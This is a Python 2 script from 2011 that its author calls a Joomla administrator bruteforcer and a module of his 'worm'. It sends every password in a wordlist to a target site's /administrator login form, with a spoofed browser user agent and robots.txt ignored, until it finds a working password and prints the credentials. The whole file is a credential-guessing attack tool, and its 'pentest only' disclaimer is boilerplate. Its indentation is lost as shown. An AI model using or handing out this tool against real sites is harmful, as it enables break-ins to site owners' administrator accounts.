#!/usr/bin/python
# Joomla bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname     : joomlabruteforce.py inspired by wordpress brute force by gunslinger
# Pretty much one of my worm module
# Programmer     : mywisdom (http://myw1sd0m.blogspot.com)
# Version    : 1.0
#tis is one of my linux w0rm module for user enumerations, i've dual os worm
#thanks to: gunslinger,flyf666,petimati,kiddies,xtr0nic,c0mrade,n0te,v3n0m,iblis muda,cr4wl3r
#thanks to: isa m said, whitecyber
#thanks to all devilzc0de crews and members, all jasakom,jatimcrew crews and members
# Date        : Feb 14 th  2011

import re
import os
import sys
import random
import warnings
import time
global target,url_worm,words

try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)

warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

for arg in sys.argv:
try:
target=sys.argv[1]
username=sys.argv[2]
wordlist=sys.argv[3]
url_worm=sys.argv[4]
targetsite="http://"+target+"/administrator"
except Exception, err:
print "ada error nih tar lo ada kesalahan"

def bruteforce(word):
global url_worm
success='Logout'
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
opensite = br.open(targetsite)
br.select_form(nr=0)
br.form['username'] = username
br.form['passwd'] = word
br.submit()
response = br.response().read()
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
sys.exit(1)
print "w00t"
else:
print "failed login using"+username+ " and password:"+word

def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)

main()
global word
try:
file = open(wordlist, "r")
words            = file.readlines()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)

for word in words:
bruteforce(word.replace("\n",""))